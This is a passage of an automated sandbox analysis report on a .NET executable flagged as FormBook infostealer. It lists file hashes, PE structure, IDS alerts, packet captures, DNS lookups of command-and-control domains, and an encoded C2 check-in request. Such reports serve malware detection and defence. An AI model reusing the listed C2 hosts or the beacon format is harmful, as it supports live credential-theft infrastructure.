Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\t577G2K6

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.250119422453478
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	zAg7xx1vKI.exe
File size:	962'560 bytes
MD5:	f8c4859851a35dc60c365f9bcdd876ec
SHA1:	4659f9fc49e48d0c2415901712856c462edce433
SHA256:	0a379ce2b635ae6c70c0893cf2ba64d653f9a0ac169c30b2dd49657ac422aecb
SHA512:	f231d0d7b3e6bf7e871ae15ff0a08cb77a3e8f35fac9f3687b271e1f49713ac37f38fcb3aa3bad68fcff5c7ca377a33bd42e72ee5507a932ef1185b1f13592fd
SSDEEP:	12288:QpZsSc0eAn5f7Y/a3XjyC+bZVDkb+UGVtxnkF/jyIHUmkuL1prsQCnkvn:QzsAe8BSa3ID8+UKtxejHNkugQC
TLSH:	DA25F73D29BD222BB175C397CBDBE427F178986F3154ACA498D343A94346A4734C326E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i-................0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4ec5aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xABD22D69 [Sat May 7 07:55:21 2061 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xec556	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xee000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xeac50	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xea5b0	0xea600	9005d729f8f1c3fa21565459c33ce029	False	0.7643270833333333	data	7.256325564586632	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xee000	0x5ac	0x600	ba36b3288a48f0c5a79c3e2cbc16dc57	False	0.4244791666666667	data	4.111458305241514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0xc	0x200	fcd72e9ec705f9e2483b249171477050	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xee090	0x31c	data			0.4396984924623116
RT_MANIFEST	0xee3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T03:50:08.120798+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49980	74.208.236.156	80	TCP
2025-01-11T03:50:31.360970+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49984	84.32.84.32	80	TCP
2025-01-11T03:50:44.505564+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49988	13.248.169.48	80	TCP
2025-01-11T03:50:58.219588+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49992	66.29.149.46	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:50:07.596853971 CET	49980	80	192.168.2.10	74.208.236.156
Jan 11, 2025 03:50:07.601675034 CET	80	49980	74.208.236.156	192.168.2.10
Jan 11, 2025 03:50:07.601752996 CET	49980	80	192.168.2.10	74.208.236.156
Jan 11, 2025 03:50:07.612428904 CET	49980	80	192.168.2.10	74.208.236.156
Jan 11, 2025 03:50:07.617218971 CET	80	49980	74.208.236.156	192.168.2.10
Jan 11, 2025 03:50:08.120094061 CET	80	49980	74.208.236.156	192.168.2.10
Jan 11, 2025 03:50:08.120721102 CET	80	49980	74.208.236.156	192.168.2.10
Jan 11, 2025 03:50:08.120798111 CET	49980	80	192.168.2.10	74.208.236.156
Jan 11, 2025 03:50:08.124175072 CET	49980	80	192.168.2.10	74.208.236.156
Jan 11, 2025 03:50:08.129139900 CET	80	49980	74.208.236.156	192.168.2.10
Jan 11, 2025 03:50:23.243179083 CET	49981	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:23.248087883 CET	80	49981	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:23.248275995 CET	49981	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:23.262274027 CET	49981	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:23.267163038 CET	80	49981	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:23.723040104 CET	80	49981	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:23.723206043 CET	49981	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:24.770296097 CET	49981	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:24.776292086 CET	80	49981	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:25.795460939 CET	49982	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:25.800426006 CET	80	49982	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:25.800581932 CET	49982	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:25.822928905 CET	49982	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:25.827833891 CET	80	49982	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:26.266149998 CET	80	49982	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:26.266247034 CET	49982	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:27.332743883 CET	49982	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:27.337681055 CET	80	49982	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:28.351598978 CET	49983	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:28.356525898 CET	80	49983	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:28.357564926 CET	49983	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:28.373672009 CET	49983	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:28.378671885 CET	80	49983	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:28.378715992 CET	80	49983	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:28.814554930 CET	80	49983	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:28.814729929 CET	49983	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:29.879687071 CET	49983	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:29.884798050 CET	80	49983	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:30.898499012 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:30.903455973 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:30.903597116 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:30.912970066 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:30.917943954 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.360761881 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.360929966 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.360941887 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.360970020 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.361268044 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.361278057 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.361649990 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.361980915 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.361993074 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.362016916 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.362751007 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.362762928 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.362776041 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:31.362786055 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.362817049 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.370399952 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 03:50:31.375242949 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 03:50:36.397572041 CET	49985	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:36.402487040 CET	80	49985	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:36.402594090 CET	49985	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:36.417176008 CET	49985	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:36.422105074 CET	80	49985	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:37.926759958 CET	49985	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:37.976589918 CET	80	49985	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:38.945045948 CET	49986	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:38.950006962 CET	80	49986	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:38.950103045 CET	49986	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:38.964422941 CET	49986	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:38.969291925 CET	80	49986	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:40.473443031 CET	49986	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:40.520776033 CET	80	49986	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:41.492057085 CET	49987	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:41.497087002 CET	80	49987	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:41.497184038 CET	49987	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:41.511157036 CET	49987	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:41.516148090 CET	80	49987	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:41.516314983 CET	80	49987	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:43.020298958 CET	49987	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:43.069015026 CET	80	49987	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.038902998 CET	49988	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:44.044209003 CET	80	49988	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.044321060 CET	49988	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:44.053711891 CET	49988	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:44.058896065 CET	80	49988	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.505316973 CET	80	49988	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.505436897 CET	80	49988	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.505563974 CET	49988	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:44.508214951 CET	49988	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:44.513190031 CET	80	49988	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.870309114 CET	80	49987	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:44.870415926 CET	49987	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:45.776391983 CET	80	49985	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:45.776469946 CET	49985	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:48.344981909 CET	80	49986	13.248.169.48	192.168.2.10
Jan 11, 2025 03:50:48.345083952 CET	49986	80	192.168.2.10	13.248.169.48
Jan 11, 2025 03:50:49.690602064 CET	49989	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:49.695605040 CET	80	49989	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:49.695738077 CET	49989	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:49.721748114 CET	49989	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:49.726813078 CET	80	49989	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:50.290543079 CET	80	49989	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:50.290581942 CET	80	49989	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:50.290642977 CET	49989	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:51.223647118 CET	49989	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:52.265057087 CET	49990	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:52.270119905 CET	80	49990	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:52.270226955 CET	49990	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:52.429961920 CET	49990	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:52.435112000 CET	80	49990	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:52.886940002 CET	80	49990	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:52.886991024 CET	80	49990	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:52.887084007 CET	49990	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:53.942274094 CET	49990	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:55.020283937 CET	49991	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:55.025182009 CET	80	49991	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:55.025299072 CET	49991	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:55.081763983 CET	49991	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:55.086659908 CET	80	49991	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:55.086750031 CET	80	49991	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:55.620913029 CET	80	49991	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:55.620959997 CET	80	49991	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:55.621125937 CET	49991	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:56.598674059 CET	49991	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:57.617194891 CET	49992	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:57.622036934 CET	80	49992	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:57.622118950 CET	49992	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:57.631330967 CET	49992	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:57.636178017 CET	80	49992	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:58.219391108 CET	80	49992	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:58.219413042 CET	80	49992	66.29.149.46	192.168.2.10
Jan 11, 2025 03:50:58.219588041 CET	49992	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:58.222647905 CET	49992	80	192.168.2.10	66.29.149.46
Jan 11, 2025 03:50:58.227509975 CET	80	49992	66.29.149.46	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:50:07.570686102 CET	62295	53	192.168.2.10	1.1.1.1
Jan 11, 2025 03:50:07.587779045 CET	53	62295	1.1.1.1	192.168.2.10
Jan 11, 2025 03:50:23.189160109 CET	57092	53	192.168.2.10	1.1.1.1
Jan 11, 2025 03:50:23.240303040 CET	53	57092	1.1.1.1	192.168.2.10
Jan 11, 2025 03:50:36.383299112 CET	50825	53	192.168.2.10	1.1.1.1
Jan 11, 2025 03:50:36.394732952 CET	53	50825	1.1.1.1	192.168.2.10
Jan 11, 2025 03:50:49.556612968 CET	64977	53	192.168.2.10	1.1.1.1
Jan 11, 2025 03:50:49.675883055 CET	53	64977	1.1.1.1	192.168.2.10
Jan 11, 2025 03:51:03.805155039 CET	64025	53	192.168.2.10	1.1.1.1
Jan 11, 2025 03:51:03.816514969 CET	53	64025	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 03:50:07.570686102 CET	192.168.2.10	1.1.1.1	0xf2b1	Standard query (0)	www.christinascuties.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:23.189160109 CET	192.168.2.10	1.1.1.1	0x90c7	Standard query (0)	www.techmiseajour.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:36.383299112 CET	192.168.2.10	1.1.1.1	0x395d	Standard query (0)	www.aktmarket.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:49.556612968 CET	192.168.2.10	1.1.1.1	0xb5d9	Standard query (0)	www.golivenow.live	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:51:03.805155039 CET	192.168.2.10	1.1.1.1	0xc56f	Standard query (0)	www.iglpg.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 03:50:07.587779045 CET	1.1.1.1	192.168.2.10	0xf2b1	No error (0)	www.christinascuties.net		74.208.236.156	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:23.240303040 CET	1.1.1.1	192.168.2.10	0x90c7	No error (0)	www.techmiseajour.net	techmiseajour.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 03:50:23.240303040 CET	1.1.1.1	192.168.2.10	0x90c7	No error (0)	techmiseajour.net		84.32.84.32	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:36.394732952 CET	1.1.1.1	192.168.2.10	0x395d	No error (0)	www.aktmarket.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:36.394732952 CET	1.1.1.1	192.168.2.10	0x395d	No error (0)	www.aktmarket.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:50:49.675883055 CET	1.1.1.1	192.168.2.10	0xb5d9	No error (0)	www.golivenow.live		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:51:03.816514969 CET	1.1.1.1	192.168.2.10	0xc56f	No error (0)	www.iglpg.online	iglpg.online		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 03:51:03.816514969 CET	1.1.1.1	192.168.2.10	0xc56f	No error (0)	iglpg.online		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:51:03.816514969 CET	1.1.1.1	192.168.2.10	0xc56f	No error (0)	iglpg.online		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.christinascuties.net

www.techmiseajour.net

www.aktmarket.xyz

www.golivenow.live

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49980	74.208.236.156	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:07.612428904 CET	410	OUT	GET /raea/?JHJt=itqtMr9H_JJ83L&nF=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0E/jI7zxjpZO1XvGaBaxKF04Rir+eQ== HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.christinascuties.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 03:50:08.120094061 CET	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Sat, 11 Jan 2025 02:50:08 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49981	84.32.84.32	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
